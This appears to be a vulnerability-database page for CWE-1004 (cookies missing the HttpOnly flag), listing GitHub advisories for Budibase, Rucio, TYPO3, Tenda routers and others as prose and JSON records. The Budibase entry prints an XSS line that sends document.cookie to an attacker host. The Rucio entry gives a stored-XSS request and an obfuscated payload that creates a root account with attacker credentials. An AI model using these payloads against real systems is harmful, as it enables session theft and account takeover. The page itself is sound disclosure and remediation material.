Common Weakness Enumeration

CWE-1004

Allowed

Sensitive Cookie Without 'HttpOnly' Flag

Abstraction: Variant · Status: Incomplete

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

70 vulnerabilities reference this CWE, most recent first.

GHSA-47M2-CQQX-CRJC

Vulnerability from github – Published: 2025-02-28 18:31 – Updated: 2025-02-28 18:31
VLAI
Details

Cookie policy is observable via built-in browser tools. In the presence of XSS, this could lead to full session compromise.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24318"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-28T17:15:16Z",
    "severity": "MODERATE"
  },
  "details": "Cookie policy is observable via built-in browser tools. In the presence of XSS, this could lead to full session compromise.",
  "id": "GHSA-47m2-cqqx-crjc",
  "modified": "2025-02-28T18:31:05Z",
  "published": "2025-02-28T18:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24318"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-058-01"
    },
    {
      "type": "WEB",
      "url": "https://www.dariohealth.com/contact"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-499F-RPFH-94VX

Vulnerability from github – Published: 2026-01-16 15:31 – Updated: 2026-01-27 15:30
VLAI
Details

In ConnectWise PSA versions older than 2026.1, certain session cookies were not set with the HttpOnly attribute. In some scenarios, this could allow client-side scripts access to session cookie values.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-0696"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-16T14:15:54Z",
    "severity": "MODERATE"
  },
  "details": "In ConnectWise PSA versions older than 2026.1, certain session cookies were not set with the HttpOnly attribute. In some scenarios, this could allow client-side scripts access to session cookie values.",
  "id": "GHSA-499f-rpfh-94vx",
  "modified": "2026-01-27T15:30:27Z",
  "published": "2026-01-16T15:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0696"
    },
    {
      "type": "WEB",
      "url": "https://www.connectwise.com/company/trust/security-bulletins/2026-01-15-psa-security-fix"
    },
    {
      "type": "WEB",
      "url": "https://www.themissinglink.com.au/security-advisories/cve-2026-0696"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-49P6-VFMW-3FPH

Vulnerability from github – Published: 2025-07-03 12:34 – Updated: 2025-07-03 12:34
VLAI
Details

The HttpOnly flag is set to false on the PHPSESSION cookie. Therefore, the cookie can be accessed by other sources such as JavaScript.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-27453"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-03T12:15:23Z",
    "severity": "MODERATE"
  },
  "details": "The HttpOnly flag is set to false on the PHPSESSION cookie. Therefore, the cookie can be accessed by other sources such as JavaScript.",
  "id": "GHSA-49p6-vfmw-3fph",
  "modified": "2025-07-03T12:34:58Z",
  "published": "2025-07-03T12:34:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27453"
    },
    {
      "type": "WEB",
      "url": "https://sick.com/psirt"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
    },
    {
      "type": "WEB",
      "url": "https://www.endress.com"
    },
    {
      "type": "WEB",
      "url": "https://www.first.org/cvss/calculator/3.1"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.json"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4F2M-4QCX-27XF

Vulnerability from github – Published: 2026-01-09 12:32 – Updated: 2026-01-09 12:32
VLAI
Details

This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the missing HTTPOnly flag for session cookies associated with the web-based administrative interface. A remote at-tacker could exploit this vulnerability by capturing session cookies transmitted over an insecure HTTP connection.

Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unau-thorized access to the targeted device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22081"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-09T12:15:54Z",
    "severity": "HIGH"
  },
  "details": "This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the missing HTTPOnly flag for session cookies associated with the web-based administrative interface. A remote at-tacker could exploit this vulnerability by capturing session cookies transmitted over an insecure HTTP connection.\n\nSuccessful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unau-thorized access to the targeted device.",
  "id": "GHSA-4f2m-4qcx-27xf",
  "modified": "2026-01-09T12:32:26Z",
  "published": "2026-01-09T12:32:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22081"
    },
    {
      "type": "WEB",
      "url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2026-0004"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4F9J-VR4P-642R

Vulnerability from github – Published: 2026-04-24 16:18 – Updated: 2026-05-11 13:29
VLAI
Summary
Budibase auth session cookies are set with httpOnly:false — any XSS can lead to full account takeover
Details

Summary

The budibase:auth cookie containing the JWT session token is set with httpOnly: false at packages/backend-core/src/utils/utils.ts:218. JavaScript can read this cookie via document.cookie. Given that Budibase has had XSS vulnerabilities (GHSA-gp5x-2v54-v2q5 — stored XSS via unsanitized entity names, published April 2, 2026), this means every XSS becomes a full account takeover — the attacker steals the JWT and has persistent access to the victim's account.

The cookie also lacks secure: true (sent over plaintext HTTP) and sameSite attribute.

Details

packages/backend-core/src/utils/utils.ts, lines 215-226:

const config: SetOption = {
  expires: MAX_VALID_DATE,
  path: "/",
  httpOnly: false,     // ← JavaScript can read the session JWT
  overwrite: true,
}

if (env.COOKIE_DOMAIN) {
  config.domain = env.COOKIE_DOMAIN
}

ctx.cookies.set(name, value, config)

This function is called for setting the budibase:auth cookie which contains the signed JWT session token. With httpOnly: false, any JavaScript execution context (XSS, injected script, browser extension) can read the token via document.cookie.

Missing flags: - httpOnly: false → should be true (prevent JS access) - No secure flag → cookie sent over HTTP (should be secure: true for HTTPS deployments) - No sameSite → susceptible to cross-site request attachment (should be sameSite: 'lax')

PoC

Any XSS payload can steal the session:

// Attacker's XSS payload — steals session and sends to attacker server
new Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);

With httpOnly: true, this payload would get an empty string for the auth cookie. Without it, the full JWT is exfiltrated.

Combined with GHSA-gp5x-2v54-v2q5 (stored XSS in entity names), an attacker could: 1. Create an entity with a name containing <script> payload 2. Any user who views that entity has their JWT stolen 3. Attacker uses the JWT for persistent account access

Impact

Every XSS vulnerability — past, present, and future — becomes a full account takeover. The httpOnly flag is the primary defense that limits XSS impact to the current session/page. Without it, XSS escalates from "session riding" to "persistent credential theft."

This affects all Budibase deployments since the cookie configuration is hardcoded.

ATTACHMENTS

BUDIBASE-TOP10-REPORT.md


Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/backend-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.35.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42239"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T16:18:52Z",
    "nvd_published_at": "2026-05-07T20:16:44Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `budibase:auth` cookie containing the JWT session token is set with `httpOnly: false` at `packages/backend-core/src/utils/utils.ts:218`. JavaScript can read this cookie via `document.cookie`. Given that Budibase has had XSS vulnerabilities (GHSA-gp5x-2v54-v2q5 \u2014 stored XSS via unsanitized entity names, published April 2, 2026), this means every XSS becomes a full account takeover \u2014 the attacker steals the JWT and has persistent access to the victim\u0027s account.\n\nThe cookie also lacks `secure: true` (sent over plaintext HTTP) and `sameSite` attribute.\n\n### Details\n\n`packages/backend-core/src/utils/utils.ts`, lines 215-226:\n\n```typescript\nconst config: SetOption = {\n  expires: MAX_VALID_DATE,\n  path: \"/\",\n  httpOnly: false,     // \u2190 JavaScript can read the session JWT\n  overwrite: true,\n}\n\nif (env.COOKIE_DOMAIN) {\n  config.domain = env.COOKIE_DOMAIN\n}\n\nctx.cookies.set(name, value, config)\n```\n\nThis function is called for setting the `budibase:auth` cookie which contains the signed JWT session token. With `httpOnly: false`, any JavaScript execution context (XSS, injected script, browser extension) can read the token via `document.cookie`.\n\nMissing flags:\n- `httpOnly: false` \u2192 should be `true` (prevent JS access)\n- No `secure` flag \u2192 cookie sent over HTTP (should be `secure: true` for HTTPS deployments)\n- No `sameSite` \u2192 susceptible to cross-site request attachment (should be `sameSite: \u0027lax\u0027`)\n\n### PoC\n\nAny XSS payload can steal the session:\n\n```javascript\n// Attacker\u0027s XSS payload \u2014 steals session and sends to attacker server\nnew Image().src = \u0027https://attacker.com/steal?cookie=\u0027 + encodeURIComponent(document.cookie);\n```\n\nWith `httpOnly: true`, this payload would get an empty string for the auth cookie. Without it, the full JWT is exfiltrated.\n\nCombined with GHSA-gp5x-2v54-v2q5 (stored XSS in entity names), an attacker could:\n1. Create an entity with a name containing `\u003cscript\u003e` payload\n2. Any user who views that entity has their JWT stolen\n3. Attacker uses the JWT for persistent account access\n\n### Impact\n\nEvery XSS vulnerability \u2014 past, present, and future \u2014 becomes a full account takeover. The `httpOnly` flag is the primary defense that limits XSS impact to the current session/page. Without it, XSS escalates from \"session riding\" to \"persistent credential theft.\"\n\nThis affects all Budibase deployments since the cookie configuration is hardcoded.\n\n## ATTACHMENTS\n\n[BUDIBASE-TOP10-REPORT.md](https://github.com/user-attachments/files/26508656/BUDIBASE-TOP10-REPORT.md)\n\n---",
  "id": "GHSA-4f9j-vr4p-642r",
  "modified": "2026-05-11T13:29:32Z",
  "published": "2026-04-24T16:18:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-4f9j-vr4p-642r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42239"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/3.35.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase auth session cookies are set with httpOnly:false \u2014 any XSS can lead to full account takeover"
}

GHSA-59HV-6Q62-JCJ4

Vulnerability from github – Published: 2025-06-12 15:31 – Updated: 2025-06-12 15:31
VLAI
Details

The HttpOnlyflag of the session cookie \"@@\" is set to false. Since this flag helps preventing access to cookies via client-side scripts, setting the flag to false can lead to a higher possibility of Cross-Side-Scripting attacks which target the stored cookies.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-49189"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-12T14:15:31Z",
    "severity": "MODERATE"
  },
  "details": "The HttpOnlyflag of the session cookie \\\"@@\\\" is set to false. Since this flag helps preventing access to cookies via client-side scripts, setting the flag to false can lead to a higher possibility of Cross-Side-Scripting attacks which target the stored cookies.",
  "id": "GHSA-59hv-6q62-jcj4",
  "modified": "2025-06-12T15:31:22Z",
  "published": "2025-06-12T15:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49189"
    },
    {
      "type": "WEB",
      "url": "https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF"
    },
    {
      "type": "WEB",
      "url": "https://sick.com/psirt"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
    },
    {
      "type": "WEB",
      "url": "https://www.first.org/cvss/calculator/3.1"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0007.json"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0007.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5W45-P567-G3R4

Vulnerability from github – Published: 2025-10-14 03:30 – Updated: 2025-10-14 03:30
VLAI
Details

SAP Cloud Appliance Library Appliances allows an attacker with high privileges to leverage an insecure S/4HANA default profile setting in an existing SAP CAL appliances to gain access to other appliances. This has low impact on confidentiality of the application, integrity and availability is not impacted.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-42909"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-14T01:15:32Z",
    "severity": "LOW"
  },
  "details": "SAP Cloud Appliance Library Appliances allows an attacker with high privileges to leverage an insecure S/4HANA default profile setting in an existing SAP CAL appliances to gain access to other appliances. This has low impact on confidentiality of the application, integrity and availability is not impacted.",
  "id": "GHSA-5w45-p567-g3r4",
  "modified": "2025-10-14T03:30:57Z",
  "published": "2025-10-14T03:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-42909"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3643871"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-86W3-PW2M-73FQ

Vulnerability from github – Published: 2024-07-30 18:32 – Updated: 2024-07-30 18:32
VLAI
Details

IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 228587.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-33167"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-30T17:15:10Z",
    "severity": "LOW"
  },
  "details": "IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.  IBM X-Force ID:  228587.",
  "id": "GHSA-86w3-pw2m-73fq",
  "modified": "2024-07-30T18:32:06Z",
  "published": "2024-07-30T18:32:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33167"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/228587"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7161469"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8WPV-6X3F-3RM5

Vulnerability from github – Published: 2026-02-25 19:29 – Updated: 2026-02-27 21:50
VLAI
Summary
Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability its Identity Name
Details

Summary

A stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.


Details

The identity name is stored and later rendered without output encoding.

Create Path:
Admin > Account Management > ACCOUNT NAME > Add Account Identity

Trigger Path:
Admin > Account Management > ACCOUNT NAME
(https://127.0.0.1:8443/ui/account?account=pentest)

Request

POST /proxy/accounts/pentest/identities HTTP/1.1
...
{"identity":"<script>alert(document.cookie)</script>","authtype":"SSH","email":"Test"}

Response

HTTP/1.1 201 CREATED
...
Created

Storing XSS payload in account identity name Storing XSS payload in account identity name

Triggering XSS payload when viewing account Triggering XSS payload when viewing account


Impact

Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.

The impact is amplified by: - Session cookies that are accessible to JavaScript (missing HttpOnly flag). - API tokens exposed to the WebUI via JavaScript variables.

An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.

XSS Payload to Create Root UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Remediation / Mitigation

All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.

Additional defense-in-depth measures include: - Enforcing a strict Content Security Policy (CSP). - Setting the HttpOnly flag on session cookies. - Avoiding exposure of API tokens in JavaScript-accessible variables.

Note that many pages were found setting the API token as token in an authenticated response like var token = "root-root-webui-...:" (See /ui/list_accounts for example)


References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "35.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0rc1"
            },
            {
              "fixed": "38.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "39.0.0rc1"
            },
            {
              "fixed": "39.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25735"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T19:29:37Z",
    "nvd_published_at": "2026-02-25T20:23:48Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nThe identity name is stored and later rendered without output encoding.\n\n**Create Path**:  \nAdmin \u003e Account Management \u003e _ACCOUNT NAME_ \u003e Add Account Identity\n\n**Trigger Path**:  \nAdmin \u003e Account Management \u003e _ACCOUNT NAME_  \n(`https://127.0.0.1:8443/ui/account?account=pentest`)\n\n**Request**\n```http\nPOST /proxy/accounts/pentest/identities HTTP/1.1\n...\n{\"identity\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\",\"authtype\":\"SSH\",\"email\":\"Test\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS payload in account identity name**\n\u003cimg width=\"1385\" height=\"807\" alt=\"Storing XSS payload in account identity name\" src=\"https://github.com/user-attachments/assets/e4209ef4-fd88-492f-9fb0-afb7d04b15ce\" /\u003e\n\n**Triggering XSS payload when viewing account**\n\u003cimg width=\"1395\" height=\"745\" alt=\"Triggering XSS payload when viewing account\" src=\"https://github.com/user-attachments/assets/e6217669-a0f7-4aba-bb05-f4fb7049611c\" /\u003e\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### References\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
  "id": "GHSA-8wpv-6x3f-3rm5",
  "modified": "2026-02-27T21:50:24Z",
  "published": "2026-02-25T19:29:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25735"
    },
    {
      "type": "WEB",
      "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rucio/rucio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability its Identity Name"
}

GHSA-F777-F784-36GM

Vulnerability from github – Published: 2024-06-07 19:52 – Updated: 2024-06-07 19:52
VLAI
Summary
TYPO3 Security Misconfiguration in Install Tool Cookie
Details

It has been discovered that cookies created in the Install Tool are not hardened to be submitted only via HTTP. In combination with other vulnerabilities such as cross-site scripting it can lead to hijacking an active and valid session in the Install Tool.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.6.32"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.7.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-07T19:52:43Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "It has been discovered that cookies created in the Install Tool are not hardened to be submitted only via HTTP. In combination with other vulnerabilities such as cross-site scripting it can lead to hijacking an active and valid session in the Install Tool.",
  "id": "GHSA-f777-f784-36gm",
  "modified": "2024-06-07T19:52:43Z",
  "published": "2024-06-07T19:52:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3/typo3/commit/13328b0f74ac589a20b021db814dfa672581c26a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3/typo3/commit/918e50e4d20d88c7e40ad3bb134267d07706b0b1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3/typo3/commit/a5359491e3fb3164a6ba96a66c8e67fbb9971a4c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/2018-12-11-4.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/TYPO3/typo3"
    },
    {
      "type": "WEB",
      "url": "https://typo3.org/security/advisory/typo3-core-sa-2018-009"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "TYPO3 Security Misconfiguration in Install Tool Cookie"
}

Mitigation
Implementation

Leverage the HttpOnly flag when setting a sensitive cookie in a response.

No CAPEC attack patterns related to this CWE.